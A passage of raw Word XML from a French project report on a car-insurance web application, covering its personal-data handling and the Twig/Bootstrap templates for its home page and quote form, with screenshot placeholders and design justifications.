      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="7DC6E557" w14:textId="0DF85FE5" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00A30B5C">
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'application traite deux types de données personnelles : des données d'identité (prénom, nom, adresse e-mail) collectées lors de l'inscription, et des documents justificatifs (permis de conduire, carte grise) déposés lors d'une demande de souscription. Ces documents sont stockés côté serveur et ne sont accessibles qu'aux utilisateurs et à l'administrateur concernés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52592DFF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00A30B5C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Un lien « Mentions légales » est présent dans le pied de page de chaque page. Le traitement des données est limité au strict nécessaire pour la gestion des souscriptions d'assurance automobile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42467610" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="242C2944" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00540A83">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc233817756"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Réalisation des interfaces utilisateur statiques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="75973D0B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00A30B5C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc233817757"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.3.1 Interface statique n°1 – Page d'accueil</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="460DD74A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00A30B5C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Capture d'écran de l'interface :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B715F88" w14:textId="77777777" w:rsidR="00A30B5C" w:rsidRDefault="00A30B5C"/>
    <w:p w14:paraId="24696EFB" w14:textId="414CD7C8" w:rsidR="003A6B7F" w:rsidRDefault="00A30B5C" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BFEDA64" wp14:editId="3CFF84C0">
            <wp:extent cx="5080883" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="101852589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5894" name="Image 1018525894"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5111122" cy="3238611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACE849" w14:textId="77777777" w:rsidR="00A30B5C" w:rsidRDefault="00A30B5C"/>
    <w:p w14:paraId="7BD35F62" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:r>
        <w:t>Extrait de code Twig/HTML le plus représentatif :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A92347" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRDefault="001F6DEE"/>
    <w:p w14:paraId="18AC447D" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="001F6DEE" w:rsidRDefault="001F6DEE" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">{# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index.html.twig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> #}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC3BC4"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800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;main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"my-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D8533"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"text-center"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BDBCF" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="001F6DEE"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1F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;h1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-semibold"</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C456E" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRDefault="001F6DEE" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6DEE">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Pour chaque route, une assurance adaptée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A804D67" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172623FD"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F63E6"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sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E830DD"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"row gy-4 my-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA784F9"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 xml:space="preserve">{% for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>formula</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in formulas %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA51382"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"col-12 col-md-6 col-lg-4 col-xl-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA2DE7"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"card h-100 border-blue"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFE24A"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"card-body"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC915F6"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&lt;h4</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"card-title text-blue"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</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formula.name </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C597B"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E198BA"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ACF7A1"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4B016"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 xml:space="preserve">{% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>endfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603F23D" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070FB7C" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00555B5E" w:rsidRDefault="001F6DEE" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;/main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF2863" w14:textId="25E68C97" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F" w:rsidP="001F6DEE">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BD4C7C" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="3A2C07E4" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00EC1B7B" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1B7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Justification des choix techniques :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46377D4F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La page repose sur la balise sémantique &lt;main&gt; qui délimite le contenu principal. La grille Bootstrap (col-12 col-md-6 col-lg-4 col-xl-3) assure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>un affichage responsive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : 1 colonne </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sur mobile, 2 sur tablette, 3 ou 4 sur écran large. La hiérarchie des titres h1/h4 respecte la structure sémantique du document HTML. Les classes personnalisées (border-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>text-blue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>btn-blue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) s'appuient sur le thème </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bootswatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour un rendu cohérent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CF247A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00540A83" w:rsidRDefault="003A6B7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004E9A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB741EB" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc233817758"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.3.2 Interface statique n°2 – Formulaire de devis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="6368E043" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Capture d'écran :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC621A" w14:textId="70F2CB66" w:rsidR="003A6B7F" w:rsidRDefault="00EC1B7B" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC1B7B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D720004" wp14:editId="778A29C3">
            <wp:extent cx="5731510" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1426583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3411" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3708400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F70452" w14:textId="77777777" w:rsidR="00EC1B7B" w:rsidRDefault="00EC1B7B" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373C83FF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:r>
        <w:t>Extrait de code Twig le plus représentatif :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22088D80" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRDefault="001F6DEE"/>
    <w:p w14:paraId="4B17BFB1" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="001F6DEE" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">{# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new.html.twig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> #}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921CCF4" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="001F6DEE" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>form_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, { '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>attr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
